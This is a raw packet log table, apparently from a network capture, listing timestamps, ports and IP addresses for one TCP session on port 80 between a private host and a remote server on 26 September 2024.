Sep 26, 2024 06:00:22.054915905 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.054924011 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.054934978 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.054940939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.054953098 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.054959059 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.054975033 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.054990053 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055001020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055016994 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055027962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055036068 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055046082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055052996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055064917 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055073023 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055082083 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055089951 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055100918 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055107117 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055119038 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055125952 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055135965 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055151939 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055157900 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055169106 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055180073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055191040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055201054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055210114 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055221081 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055231094 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055238962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055247068 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055257082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055269957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055279016 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055289030 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055300951 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055309057 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055318117 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055325985 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055335045 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055345058 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055354118 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055361032 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055372953 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055380106 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055396080 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055406094 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055416107 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055425882 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055438042 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055444002 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055453062 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055459976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055468082 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055475950 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055486917 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055497885 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055509090 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055516958 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055529118 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055536985 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055546045 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055553913 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055562973 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055577040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055583000 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055593014 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055600882 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055609941 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055628061 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.055634022 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055651903 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.055675030 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056282043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056314945 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056617975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056631088 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056642056 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056648016 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056655884 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056674957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056680918 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056690931 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056699991 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056713104 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056724072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056735039 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056746960 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056767941 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056773901 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056782007 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056792021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056804895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056814909 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056828022 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056833982 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056844950 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056854963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056864023 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056873083 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056884050 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056901932 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056914091 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056924105 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056932926 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056945086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056955099 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056968927 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.056974888 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056987047 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.056993961 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057004929 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057024002 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057034969 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057043076 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057061911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057071924 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057080030 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057092905 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057097912 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057111025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057120085 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057133913 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057138920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057151079 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057157040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057167053 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057178020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057184935 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057203054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057214022 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057220936 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057238102 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057246923 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057257891 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057265997 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057276011 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057296991 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057296991 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057307005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057318926 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057332993 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057341099 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057354927 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057363033 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057374001 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057379961 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057393074 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057400942 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057410955 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057419062 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057432890 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057439089 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057449102 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057457924 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057466984 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057477951 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057490110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057498932 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057509899 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057521105 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057529926 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057539940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057548046 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057558060 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057574987 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057581902 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057591915 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057599068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057622910 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057634115 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057668924 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057681084 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057692051 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057703972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057714939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057723045 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057733059 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057745934 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057755947 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057768106 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057775974 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057786942 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057796955 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057809114 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057826996 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057832956 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057842970 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057851076 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057862043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057869911 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057879925 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057885885 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057898045 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057904005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057921886 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057926893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057936907 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057951927 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057957888 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057966948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057976007 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.057986021 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.057997942 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058005095 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058016062 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058031082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058037043 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058043003 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058052063 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058064938 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058073997 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058084011 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058092117 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058101892 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058109999 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058120012 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058129072 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058140993 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058151007 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058160067 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058172941 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058177948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058190107 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058197975 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058207989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058221102 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058228970 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058240891 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058254004 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058260918 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058271885 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058279037 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058290005 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058300972 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058310986 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058321953 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058331013 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058340073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058351040 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058358908 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058372974 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058377981 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058387041 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058398008 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058407068 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058417082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058423996 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058433056 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058444977 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058454037 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058464050 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058487892 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058497906 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058528900 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058542967 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058554888 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.058592081 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058604002 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.058784008 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060067892 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060095072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060107946 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060125113 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060137033 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060137033 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060148001 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060158968 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060167074 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060184956 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060194016 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060204029 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060216904 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060224056 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060234070 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060241938 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060255051 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060261965 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060278893 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060285091 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060295105 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060302973 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060313940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060321093 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060339928 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060352087 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060358047 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060375929 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060385942 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060399055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060410976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060419083 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060435057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060441971 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060450077 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060460091 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060467958 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060477972 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060489893 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060498953 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060509920 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060518026 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060527086 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060537100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060548067 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060565948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060576916 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060587883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060600996 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060612917 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060627937 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060633898 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060642958 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060657978 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060663939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060674906 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060683012 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060704947 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060710907 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060720921 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060729980 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060739040 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060748100 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060760975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060769081 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060779095 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060786963 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060796976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:22.060805082 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:22.060815096 CEST	80	49704	185.215.113.37	192.168.2.8
